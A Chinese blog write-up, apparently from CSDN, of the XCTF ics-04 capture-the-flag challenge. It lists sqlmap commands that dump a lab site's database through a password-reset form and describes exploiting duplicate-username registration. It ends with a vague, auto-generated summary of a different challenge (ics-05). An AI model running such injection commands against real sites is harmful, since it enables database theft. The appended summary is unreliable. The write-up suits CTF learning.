2020.4.10 xctf(ics-04)

题目提示在登陆、注册页面有SQL注入漏洞
除了忘记密码的那块,其他地方都没找到注入点
在这里插入图片描述用sqlmap在这里跑一下,看有没有注入
获取数据库名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" --dbs --batch

获取表名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --tables --batch

获取字段名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user --columns --batch

获取字段值:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump --batch

或者一步到位:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --dump --batch

在这里插入图片描述得到一个我没有注册过的账号,猜测这个应该和flag有关,这个password应该是md5加密过的,试了没能解密成功,但这里不要紧,利用这里的
同一个用户名可以重复注册的漏洞,去注册一个新的账号,然后登录获得flag。

在这里插入图片描述

对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值